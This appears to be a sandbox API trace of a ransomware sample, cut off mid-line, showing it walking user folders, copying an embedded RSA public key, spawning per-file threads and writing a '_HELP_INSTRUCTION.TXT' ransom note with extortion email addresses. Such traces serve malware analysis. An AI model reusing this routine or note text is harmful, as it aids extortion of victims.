StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0033.661] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0033.661] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0033.661] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0033.661] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0033.661] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0033.661] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0033.661] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0033.661] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.661] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0033.661] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a0 [0033.661] Sleep (dwMilliseconds=0x96) [0033.817] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0033.817] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0033.817] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0033.817] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0033.817] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0033.817] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0033.817] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0033.817] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0033.817] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0033.817] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0033.817] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0033.817] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.817] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0033.817] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x390 [0033.818] Sleep (dwMilliseconds=0x96) [0033.973] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0033.973] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0033.973] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0033.973] StrStrW (lpFirst="ntuser.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0033.973] StrStrW (lpFirst="ntuser.ini", lpSrch="ntldr") returned 0x0 [0033.973] StrStrW (lpFirst="ntuser.ini", lpSrch="NTLDR") returned 0x0 [0033.973] StrStrW (lpFirst="ntuser.ini", lpSrch="NTDETECT.COM") returned 0x0 [0033.973] StrStrW (lpFirst="ntuser.ini", lpSrch="ntdetect.com") returned 0x0 [0033.973] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0033.973] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0033.973] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0033.973] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.973] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0033.973] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c4 [0033.974] Sleep (dwMilliseconds=0x96) [0034.130] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.130] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.131] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0034.131] FindClose (in: hFindFile=0x324738 | out: hFindFile=0x324738) returned 1 [0034.131] FindClose (in: hFindFile=0x324738 | out: hFindFile=0x324738) returned 0 [0034.131] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0034.131] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0034.131] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0034.131] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0034.131] SetErrorMode (uMode=0x1) returned 0x1 [0034.131] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT") returned 51 [0034.131] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0034.132] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0034.132] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x3d0) returned 0x0 [0034.132] RegQueryValueExW (in: hKey=0x3d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e107a8, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3e107a8*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0034.132] RegCloseKey (hKey=0x3d0) returned 0x0 [0034.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0034.132] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0034.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0034.133] WriteFile (in: hFile=0x3d0, lpBuffer=0x17b57c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17b574, lpOverlapped=0x0 | out: lpBuffer=0x17b57c*, lpNumberOfBytesWritten=0x17b574*=0x2c4, lpOverlapped=0x0) returned 1 [0034.133] CloseHandle (hObject=0x3d0) returned 1 [0034.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x324738 [0034.133] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0034.134] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0034.134] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0034.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0034.134] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.134] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0034.134] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.134] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.134] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0034.134] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0034.134] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0034.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0034.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0034.134] SetErrorMode (uMode=0x1) returned 0x1 [0034.134] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0034.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0034.134] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0034.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0034.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0034.134] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0034.134] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0034.134] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0034.134] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0034.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0034.134] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="Desktop") returned 0x0 [0034.134] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="DESKTOP") returned 0x0 [0034.134] SetErrorMode (uMode=0x1) returned 0x1 [0034.134] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT") returned 59 [0034.135] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0034.135] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0034.135] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x3d4) returned 0x0 [0034.135] RegQueryValueExW (in: hKey=0x3d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e109d8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3e109d8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0034.135] RegCloseKey (hKey=0x3d4) returned 0x0 [0034.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0034.135] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0034.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0034.136] WriteFile (in: hFile=0x3d4, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0034.136] CloseHandle (hObject=0x3d4) returned 1 [0034.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0034.137] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0034.137] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0034.137] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0034.137] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.137] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0034.137] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0034.137] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0034.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0034.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0034.137] SetErrorMode (uMode=0x1) returned 0x1 [0034.137] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0034.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0034.137] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0034.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0034.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0034.137] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0034.137] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0034.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 